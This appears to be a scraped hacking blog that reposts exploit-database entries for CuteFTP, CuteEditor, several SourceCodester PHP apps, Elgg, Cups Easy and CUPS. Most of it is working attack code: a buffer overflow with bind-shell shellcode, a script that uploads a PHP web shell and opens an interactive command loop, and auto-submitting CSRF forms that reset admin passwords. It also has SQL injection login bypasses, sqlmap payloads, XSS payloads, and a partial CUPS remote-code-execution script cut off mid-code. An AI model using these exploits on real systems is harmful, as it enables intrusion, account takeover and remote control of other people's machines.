# Exploit Title: CuteFTP 9.3.0.3 - Denial of Service (PoC)
# Date: 2018-11-05
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: https://www.globalscape.com/cuteftp
# Version: 9.3.0.3
# Tested on: Windows 10 Home x64
# CVE : n/a
# STEPS
# Run the python exploit script, it will create a new .txt files
# Open the program CuteFTP
# Copy the content of the file "Cute.txt"
# Paste the content in the fields Host, Username and Password
# In the field "Hostname or IP" paste the content of the file "IP.txt"
# Click in Connect
# End :)
buffer = 'A' * 1000
try:
file = open("Cute.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147392
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title : CuteFTP 8.3.1 - Denial Of Service (PoC)
# Exploit Author : Ali Alipour
# WebSite : Alipour.it
# Date: 2018-08-22
# Vendor Homepage : http://www.cuteftp.com/
# Software Link Download : https://filehippo.com/download_cuteftp_pro/4518/
# Tested on : Windows 10 - 64-bit
# Steps to Reproduce
# Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the CuteFTP program.
# In the new window click "File" > "Connect" > "Connect To URL" .
# Now Paste the content of "exploit.txt" into the field: " Connect To URL ".
# Click "OK" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 7000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: CuteFTP 5.0 - Buffer Overflow
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe
# Tested on: Windows XP Profesional SP3 English x86
# STEPS:
# 1. The python script will generate an 'exploit.txt' file.
# 2. Start CuteFTP
# 3. In the program menu click "File" > "Site Manager" > "New" and paste the content of
# the exploit file into the 'label' field and provide a dummy IP addresss.
# 4. Right click on the site name and 'create shortcut'
# 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking.
# 6. Quit CuteFTP and launch the newly created 'shortcut'.exe
# 7. $ nc [target_ip] 6666
# 8. celebrate moderately
ret="\xD8\xFC\x91\x7C" #ntdll.dll 7C91FCD8
nops = '\x90'*30
#msfvenom -p windows/shell_bind_tcp LPORT=6666 -b '\x0a\x00\x0d' -f python
sc = ""
sc += "\xdb\xd8\xb8\xa7\x37\x29\x0e\xd9\x74\x24\xf4\x5b\x33"
sc += "\xc9\xb1\x53\x31\x43\x17\x83\xeb\xfc\x03\xe4\x24\xcb"
sc += "\xfb\x16\xa2\x89\x04\xe6\x33\xee\x8d\x03\x02\x2e\xe9"
sc += "\x40\x35\x9e\x79\x04\xba\x55\x2f\xbc\x49\x1b\xf8\xb3"
sc += "\xfa\x96\xde\xfa\xfb\x8b\x23\x9d\x7f\xd6\x77\x7d\x41"
sc += "\x19\x8a\x7c\x86\x44\x67\x2c\x5f\x02\xda\xc0\xd4\x5e"
sc += "\xe7\x6b\xa6\x4f\x6f\x88\x7f\x71\x5e\x1f\x0b\x28\x40"
sc += "\x9e\xd8\x40\xc9\xb8\x3d\x6c\x83\x33\xf5\x1a\x12\x95"
sc += "\xc7\xe3\xb9\xd8\xe7\x11\xc3\x1d\xcf\xc9\xb6\x57\x33"
sc += "\x77\xc1\xac\x49\xa3\x44\x36\xe9\x20\xfe\x92\x0b\xe4"
sc += "\x99\x51\x07\x41\xed\x3d\x04\x54\x22\x36\x30\xdd\xc5"
sc += "\x98\xb0\xa5\xe1\x3c\x98\x7e\x8b\x65\x44\xd0\xb4\x75"
sc += "\x27\x8d\x10\xfe\xca\xda\x28\x5d\x83\x2f\x01\x5d\x53"
sc += "\x38\x12\x2e\x61\xe7\x88\xb8\xc9\x60\x17\x3f\x2d\x5b"
sc += "\xef\xaf\xd0\x64\x10\xe6\x16\x30\x40\x90\xbf\x39\x0b"
sc += "\x60\x3f\xec\xa6\x68\xe6\x5f\xd5\x95\x58\x30\x59\x35"
sc += "\x31\x5a\x56\x6a\x21\x65\xbc\x03\xca\x98\x3f\x31\x01"
sc += "\x14\xd9\x2f\x05\x70\x71\xc7\xe7\xa7\x4a\x70\x17\x82"
sc += "\xe2\x16\x50\xc4\x35\x19\x61\xc2\x11\x8d\xea\x01\xa6"
sc += "\xac\xec\x0f\x8e\xb9\x7b\xc5\x5f\x88\x1a\xda\x75\x7a"
sc += "\xbe\x49\x12\x7a\xc9\x71\x8d\x2d\x9e\x44\xc4\xbb\x32"
sc += "\xfe\x7e\xd9\xce\x66\xb8\x59\x15\x5b\x47\x60\xd8\xe7"
sc += "\x63\x72\x24\xe7\x2f\x26\xf8\xbe\xf9\x90\xbe\x68\x48"
sc += "\x4a\x69\xc6\x02\x1a\xec\x24\x95\x5c\xf1\x60\x63\x80"
sc += "\x40\xdd\x32\xbf\x6d\x89\xb2\xb8\x93\x29\x3c\x13\x10"
sc += "\x59\x77\x39\x31\xf2\xde\xa8\x03\x9f\xe0\x07\x47\xa6"
sc += "\x62\xad\x38\x5d\x7a\xc4\x3d\x19\x3c\x35\x4c\x32\xa9"
sc += "\x39\xe3\x33\xf8"
buffer = "A" * 520+ ret + nops + sc + "C" * (3572 - len(sc))
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s recreational bytes..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal
# Google Dork: N/A
# Date: November 17th, 2021
# Exploit Author: Stefan Hesselman
# Vendor Homepage: http://phphtmledit.com/
# Software Link: http://phphtmledit.com/download/phphtmledit.zip
# Version: 6.6
# Tested on: Windows Server 2019
# CVE : N/A
There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.
File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121
Vulnerable code:
[SNIP]
function ServerMapPath($input_path,$absolute_path,$virtual_path)
{
if($absolute_path!="")
{
return $absolute_path.str_ireplace($virtual_path,"",$input_path);
}
else
{
if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))
{
if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) {
$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) {
$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
return $_SERVER["DOCUMENT_ROOT"].$input_path;
}
else
{
return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path;
}
}
}
[SNIP]
ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.
File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56
Vulnerable function (renamefile, line 57):
[SNIP]
switch ($action)
{
[SNIP]
case "renamefile":
rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));
print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";
break;
[SNIP]
$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:
C:\Inetpub\wwwroot\..\..\..\poc.html
Final result: writes poc.html to the webroot.
STEPS:
1. Create a poc.html file (XSS PoC will do).
<HTML>
<title>Path Traversal PoC</title>
<BODY>
<h1>PoC</h1>
<script>alert('directory traversal');</script>
</BODY>
</HTML>
2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.
3. Select poc.html and select "Rename File".
4. Click on the pencil icon to the right of the poc.html file.
5. Rename file to "..\..\..\poc.html".
6. Press OK. poc.html is written three directories up.
This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.
# Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site
Scripting Vulnerability in the "subject" at "ticket_list"
# Date: 28/11/2023
# Exploit Author: Geraldo Alcantara
# Vendor Homepage:
https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2023-49976
*Steps to reproduce:*
1- Log in to the application.
2- Visit the ticket creation/editing page.
3- Create/Edit a ticket and insert the malicious payload into the
"subject" field/parameter.
Payload: <dt/><b/><script>alert(document.domain)</script>
# Exploit Title: Customer Support System 1.0 - Cross-Site Request Forgery (Admin Account Takeover)
# Date: 2020-11-11
# Exploit Author: Ahmed Abbas
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Description : Admin Account Takeover
# Vulnerability Details
[+] The username and password parameters can be forged to force the password change of admin user account.
# POC - CSRF HTML
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/customer_support/ajax.php?action=save_user" method="POST">
<input type="hidden" name="id" value="1" />
<input type="hidden" name="table" value="users" />
<input type="hidden" name="firstname" value="Administrator" />
<input type="hidden" name="middlename" value="" />
<input type="hidden" name="lastname" value="" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="newpass" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS
Step 1. Login to the application with any valid credentials
Step 2. Click on the username in header and select "Manage Account".
Step 3. On "Manage Account" page, insert "<script>alert("r0b0tG4nG")</script>" in both the "First Name" & "Last Name" fields.
Step 4. Complete the other required details and click on save to update user information.
Step 5. This should trigger the XSS payloads. Whenever the user logs in with same valid credentials, the XSS payloads will be triggered
# Title: Customer Support System 1.0 - 'username' Authentication Bypass
# Date: 2020-11-11
# Exploit Author: Ahmed Abbas
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Description : Authentication Bypass
# Vulnerability Details:
[+] A SQL injection vulnerability in Customer Support System 1.0 allows remote unauthenticated attackers to bypass the authentication process via username and password parameters.
# Malicious POST Request to https://TARGET
POST /customer_support/ajax.php?action=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 62
Origin: http://localhost
Connection: close
Referer: http://localhost/customer_support/login.php
Cookie: PHPSESSID=gbattc1r1riap25kr5k2k1ureo
username=' or 1=1 or ''='&password=password&type=1
# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS
Step 1. Login to the application with admin credentials
Step 2. Click on Customer and select list.
Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite
Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
Step 5. This will inject successfully and you will have an information disclosure of all databases contents.
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=edit_staff&id=1 AND 4164=4164
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
---
# Exploit Title: Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel
# Date: 2020-11-11
# Exploit Author: Ahmed Abbas
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
Stored XSS Reproduction Steps:
1. Navigate to http://TARGET/customer_support/index.php?page=department_list
2. Click on new Department
3. Add the XSS payload into the "description" parameter value
4. Browse to the post to trigger the XSS payload
# POC
POST /customer_support/ajax.php?action=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------196034062430192961002574272606
Content-Length: 445
Origin: http://localhost
Connection: close
Referer: http://localhost/customer_support/index.php?page=department_list
Cookie: PHPSESSID=6dbp44u1fs8f0ndfqutpn3lbuq
-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="id"
4
-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="name"
Stored xss
-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="description"
<script>alert("STORED XSS")</script>
-----------------------------196034062430192961002574272606--
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
# Date: 27/07/2021
# Exploit Author: Shafique_Wasta
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1
# Tested on: Windows 10/xampp
# DESCRIPTION #
# Customer relationship management system is vulnerable to Sql Injection Auth Bypass
# Exploit Working:
# 1. Visit on localhostcrm/customer/login.php
# 2. You will see the login panel
# 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account.
# Vulnerable URL :http://localhost/crm/customer/login.php
# Payload: '=' 'or'
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution
# Date: 21.06.2021
# Exploit Author: Ishan Saha
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1.x
# Tested on: Ubuntu
# REQUREMENTS #
# run pip3 install requests colorama beautifulsoup4
# DESCRIPTION #
# # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option
# # Exploit Working:
# # 1. Starting a session with the server
# # 2. Registering a user hackerctf : hackerctf and adding payload in image
# # 3. Finding the uploaded file location in the username image tag
# # 4. Runing the payload file to give a shell
#!/usr/bin/python3
import requests , time
from bs4 import BeautifulSoup as bs
from colorama import Fore, Back, Style
# Variables : change the URL according to need
URL="http://192.168.0.245/crm/" # CHANGE THIS
shellcode = "<?php system($_GET['cmd']);?>"
filename = "shell.php"
content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"}
authdata={"username":"hackerctf","password":"hackerctf"}
def format_text(title,item):
cr = '\r\n'
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr
item=str(item)
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
return text
ShellSession = requests.Session()
response = ShellSession.post(URL+"classes/Users.php?f=create_customer",data=content_data ,files={"img":(filename,shellcode,"application/php")})
response = ShellSession.post(URL+"classes/Login.php?f=clogin",data=authdata)
response = ShellSession.get(URL + "customer/")
soup = bs(response.text,"html.parser")
location= soup.find('img')['src']
#print statements
print(format_text("Target",URL),end='')
print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
print(format_text("shell location",location),end='')
print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))
while True:
cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
if cmd == 'exit':
break
print(ShellSession.get(location + "?cmd="+cmd).content.decode())
# Exploit Title: Customer Relationship Management (CRM) System 1.0 - 'Category' Persistent Cross site Scripting
# Date: 14-05-2021
# Exploit Author: Vani K G
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Version: 1.0
# Tested on: Windows 10/XAMPP
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the
two. It occurs when a malicious script is injected directly into a
vulnerable web application.
Attack Vector :
This vulnerability can result in the attacker to inject the XSS
payload in the Title field of the page and each time any user will
open the website, the XSS triggers and attacker can able to steal the
cookie according to the crafted payload.
Vulnerable Parameters: Category input field.
Payload : <script>alert(document.domain)</script>
Vulnerable URL :
http://localhost/crm/admin/?page=services&view=category
Steps To Reproduce :
1) Go to the admin Dashboard
2) Click on Category and click Add New button.
3) Put Payload into the 'Category' input field.
4) Click on Save.
5) XSS payload will be triggered.
source: https://www.securityfocus.com/bid/48946/info
Curverider Elgg is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Curverider Elgg versions 1.7.9 and prior are vulnerable.
http://www.example.com/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f
http://www.example.com/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true
http://www.example.com/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22
http://www.example.com/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22
http://www.example.com/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22
http://www.example.com/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22
# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18803
# POC:
# 1)
# User: 'or 1=1 or ''='
# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe
# POC:
# 2)
# User: 'or 1=1 or ''='
# Pass: Null
#
# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png
#[PATH]/frmCourse.vb
#....
#47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
#48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
#49 reloadDtg(sql, dtglist)
#50 End Sub
#....
#[PATH]/includes/user.vb
#....
#05 Public Sub login(ByVal username As Object, ByVal pass As Object)
#06 Try
#07
#08 con.Open()
#09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
#10
#11
#12 If dt.Rows.Count > 0 Then
#13 If dt.Rows(0).Item("UserType") = "Administrator" Then
#14 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#16 With Form1
#17 .tsAddG.Enabled = True
#18 .tsStudent.Enabled = True
#19 .tsCurriculum.Enabled = True
#20 .tsGrades.Enabled = True
#21 .tsReport.Enabled = True
#22 .tsUtilities.Enabled = True
#23 .tsSearchStudent.Enabled = True
#24 .tsLogin.Image = My.Resources.logout
#25 .tsLogin.Text = "Logout"
#26 End With
#27
#28
#29 LoginForm1.Close()
#30
#31
#32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
#33
#34 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#36 With Form1
#37 .tsAddG.Enabled = True
#38 .tsStudent.Enabled = True
#39 .tsCurriculum.Enabled = True
#40 .tsGrades.Enabled = True
#41 .tsReport.Enabled = True
#42 .tsSearchStudent.Enabled = True
#43 .tsLogin.Image = My.Resources.logout
#44 .tsLogin.Text = "Logout"
#45 End With
#46
#47
#48
#49
#50 LoginForm1.Close()
#51
#52
#53
#54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
#55 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#56 'With Form1
#57 With Form1
#58 .tsAddG.Enabled = True
#59 .tsStudent.Enabled = True
#60 .tsCurriculum.Enabled = True
#61 .tsGrades.Enabled = True
#62 .tsReport.Enabled = True
#63
#64 .tsSearchStudent.Enabled = True
#65 .tsLogin.Image = My.Resources.logout
#66 .tsLogin.Text = "Logout"
#67 End With
#68
#69
#70 LoginForm1.Close()
#71 End If
#72
#73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
#74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
#75 'Form1.StatusStrip1.Visible = True
#76 'inserting logs
#77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
#78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
#79 'create(sql)
#80
#81 Else
#82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
#83 End If
#84 Catch ex As Exception
#85 MsgBox(ex.Message)
#86 End Try
#87 con.Close()
#88 da.Dispose()
#89 End Sub
#....
# Exploit Title: Curfew e-Pass Management System 1.0 - Stored XSS
# Date: 2/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp
1) Log into the application
2) Click on pass then click add a pass
3) Put <script>alert(1)</script> in the Full name parameter , rest all fill whatever you want.
4) Now go to manage passes, view the pass you just created.
5) You'll get popup of alert
# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
Injection
# Date: 28/9/2023
# Exploit Author: Puja Dey
# Vendor Homepage: https://phpgurukul.com
# Software Link:
https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp
1) login into the application
2) click on report on pass and capture the request in burpsuite
3) Parameter "FromDate" is vulnerable to SQL Injection
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
'SOzQ'='SOzQ&todate=&submit=
4) Put '*' in the value for the parameter and save the item as cpme
5) Run sqlmap -r cpme --batch --dbs --random-agent
# Title: Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
# Date: 2020-01-28
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/
# Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/
# Version: 1.0
# Tested on Windows 10/Kali Rolling
# CVE: CVE-2020-8424, CVE-2020-8425
# The Cups Easy (Purchase & Inventory) 1.0 web application is vulnerable to Cross Site Request Forgery
# that would allow an attacker to change the Admin password and gain unrestricted
# access to the site or delete any user.
# Proof of Concept Code for Password Change:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="PASSWORDHERE" />
<input type="hidden" name="change" value="Change" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Proof of concept for user delete:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEADDRESS/cupseasylive/userdelete.php" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="delete" value="Delete" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
#!/usr/bin/python
# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution
# Google Dork: n/a
# Date: 2/2/17
# Exploit Author: @0x00string
# Vendor Homepage: cups.org
# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2
# Version: <2.0.3
# Tested on: Ubuntu 14/15
# CVE : CVE-2015-1158
import os, re, socket, random, time, getopt, sys
from socket import *
from struct import *
def banner():
print '''
lol ty google
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target IPP service port\n"
" -c, --lib /path/to/payload.so\n"
" -f, --stomp-only Only stomp the ACL (no postex)\n"
"\n"
"Examples:\n"
"python script.py -a 10.10.10.10 -b 631 -f\n"
"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\n")
exit()
def pretty (t, m):
if (t is "+"):
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
elif (t is "-"):
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
elif (t is "*"):
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
elif (t is "!"):
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",
def createDump (input):
d, b, h = '', [], []
u = list(input)
for e in u:
h.append(e.encode("hex"))
if e == '0x0':
b.append('0')
elif 30 > ord(e) or ord(e) > 128:
b.append('.')
elif 30 < ord(e) or ord(e) < 128:
b.append(e)
i = 0
while i < len(h):
if (len(h) - i ) >= 16:
d += ' '.join(h[i:i+16])
d += " "
d += ' '.join(b[i:i+16])
d += "\n"
i = i + 16
else:
d += ' '.join(h[i:(len(h) - 0 )])
pad = len(' '.join(h[i:(len(h) - 0 )]))
d += ' ' * (56 - pad)
d += ' '.join(b[i:(len(h) - 0 )])
d += "\n"
i = i + len(h)
return d
class tcpsock:
def __init__(self, sock=None):
if sock is None:
self.sock = socket(
AF_INET, SOCK_STREAM)
self.sock.settimeout(30)
else:
self.sock = sock
def connect(self, host, port):
self.sock.connect((host, int(port)))
def tx(self, msg):
self.sock.send(msg)
def rx(self):
tmp = self.sock.recv(1024)
msg = ""
while tmp:
msg += tmp
tmp = self.sock.recv(1024)
return msg
def txrx (ip, port, proto, txpacket):
if (proto is "tcp"):
sock = tcpsock()
elif (proto is "udp"):
sock = udpsock()
else:
return None
sock.connect(ip, port)
sock.tx(txpacket)
rxpacket = sock.rx()
return rxpacket
